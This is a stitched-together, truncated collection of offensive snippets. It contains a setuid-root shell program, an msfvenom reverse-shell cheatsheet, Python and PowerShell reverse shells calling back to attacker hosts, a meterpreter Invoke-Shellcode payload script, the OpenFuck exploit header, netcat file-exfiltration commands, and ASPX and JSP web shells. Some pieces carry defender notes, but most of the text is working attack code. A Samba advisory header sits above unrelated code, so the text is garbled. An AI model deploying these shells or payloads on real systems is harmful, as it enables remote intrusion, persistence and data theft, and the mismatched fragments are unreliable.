/*source: http://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful expl...
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
/*
 * Tries to switch the process to uid 0 and gid 0, then starts an
 * interactive /bin/sh through system().
 *
 * The ID changes only succeed when the process is already privileged
 * (for example, when the binary is installed setuid-root). Neither return
 * value is inspected, so on failure the shell still starts, just with the
 * caller's own identity.
 *
 * Defender's note: a binary of this shape with the setuid bit set is a
 * persistence artifact. Regular audits of setuid/setgid files, and alerts
 * on newly created ones, will surface it.
 */
int main(void)
{
    const char *shell_cmd = "/bin/sh -i";

    (void)setuid(0);
    (void)setgid(0);
    (void)system(shell_cmd);

    return 0;
}
...
## Reverse Shell with Msfvenom - Cheatsheet
### List payloads
```
msfvenom -l
```
Or
```
msfvenom --list payloads
```
### Generate a PHP payload
```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
```
### Generate a Windows payload
##### ...
# Reverse shell one-liner python
# What it does: opens a TCP connection to <IP>:1234, duplicates the socket onto
# file descriptors 0, 1 and 2, then runs "/bin/sh -i", so the shell's input and
# output travel over that connection.
# Detection: an interpreter process that makes an outbound connection and then
# spawns an interactive /bin/sh whose stdin/stdout/stderr are a socket.
# Egress filtering limits where such a connection can go.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
...
$client = New-Object System.Net.Sockets.TCPClient("192.168.30.165",4444);
$stream = $client.GetStream();
$greeting = "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($greeting);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();
[byte[]]$bytes = 0..255|%{0};
while(($i = ...
#!/bin/bash
# meterpreter ip & port
lhost=10.10.14.xx
lport=443
echo " * Writing Payload"
cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Comman...
/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/
#include <arpa/inet.h>
#include &...
Push from Client to Listener
On target machine: nc -lp [local port] > [outfile]
On attacker machine: nc -w3 [listener IP] [listener port] < [infile]
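Sends [infile] to the listener, which stores it in [outfile]. [listener port] on the sending side is the same port as [local port] on the listening side. nc neither encrypts nor verifies the transfer, so compare a hash of both files afterwards.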
Pull from Listener to Client
On target machine: nc -lp [local port] < [infile]
On attacker machine: ...
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%--
  Web shell pattern: runs "cmd /c" followed by the raw value of the "c"
  request parameter and writes the process's standard output into the
  response. The page performs no authentication and no input validation, so
  anyone who can reach it can run commands, typically with the privileges of
  the web worker process.

  Detection and response notes:
    - The IIS worker process (w3wp.exe) starting cmd.exe is the key signal.
    - Request["c"] also matches form fields and cookies, so log review should
      cover more than the URL query string.
    - Watch the web root for unexpected .aspx files (file-integrity
      monitoring) and keep upload directories non-executable.
--%>
<%=
Process.Start(
new ProcessStartInfo("cmd" ,"/c " + Request["c"] )
{
UseShellExecute = false,
RedirectStandardOutput = true
}
).StandardOutput.ReadToEnd()
%>
...
<pre>
<%@ page import="java.util.*,java.io.*,java.lang.*"%>
<%
String cmd = request.getParameter("cmd");
Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
InputStream in = a.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine()...